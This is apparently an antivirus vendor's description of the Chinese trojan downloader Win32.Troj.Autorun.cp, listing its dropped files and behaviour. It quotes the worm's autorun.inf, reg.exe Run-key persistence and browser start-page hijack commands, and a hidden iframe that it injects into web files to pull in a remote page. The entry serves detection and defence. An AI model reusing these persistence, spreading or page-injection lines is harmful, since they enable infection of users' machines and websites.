Win32.Troj.Autorun.cp

病毒别名： 处理时间：2007-06-22 威胁级别：★

中文名称：疾行者 病毒类型：木马 影响系统：Win 9x/ME,Win 2000/NT,Win XP,Win 2003

病毒行为:

这是一个木马下载病毒，该病毒会删除被感染机器上的ghost备份文件，并且尝试感染脚本文件，尝试通过U盘传播把病毒本身传播出去。链接指定网址，下载其他木马程序。

1.%system%\\SVSH0ST.EXE

%system%\\Autorun.inf

2.病毒把本身拷贝到每个盘符下面并且命名为来lcg.exe，并且创建autorun.inf文件，内容如下：

[AutoRun]

open=lcg.exe

shell\\open=打开(&O)

shell\\open\\Command=lcg.exe

shell\\open\\Default=1

shell\\explore=资源管理器(&X)

shell\\explore\\Command=lcg.EXE

3.创建互斥量"niux"

3.运行创建进程运行下面的命令：

reg.exe

"ADD HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /V svchost /T REG_SZ /D "

"ADD HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /V svchost /T REG_SZ /D C:\\\\WINNT\\\\System32\\\\SVSH0ST.EXE /F"

"add \\"HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\" /v \\"Start Page\\" /t REG_EXPAND_SZ /d /f"

"add \\"HKCU\\\\Software\\\\Policies\\\\Microsoft\\\\Internet Explorer\\\\Control Panel\\" /v \\"HomePage\\" /t REG_DWORD /d 00000001 /f"

4.枚举所有当前窗口，如果发现窗口信息中含有以下字符，就关闭该窗口：

"病毒"

5.遍历所有的盘符，如果文件后缀名为.GHO文件(ghost备份文件)，则删除该文件，如果文件名中含有以下的

INDEX.ASP

.HTM

INDEX.PHP

DEFAULT.ASP

DEFAULT.PHP

CONN.ASP

之一的责尝试在文件末尾插入代码：

<ｉｆｒａｍｅ src=http://*/test.htm width=0 height=0><　/　ｉｆｒａｍｅ　>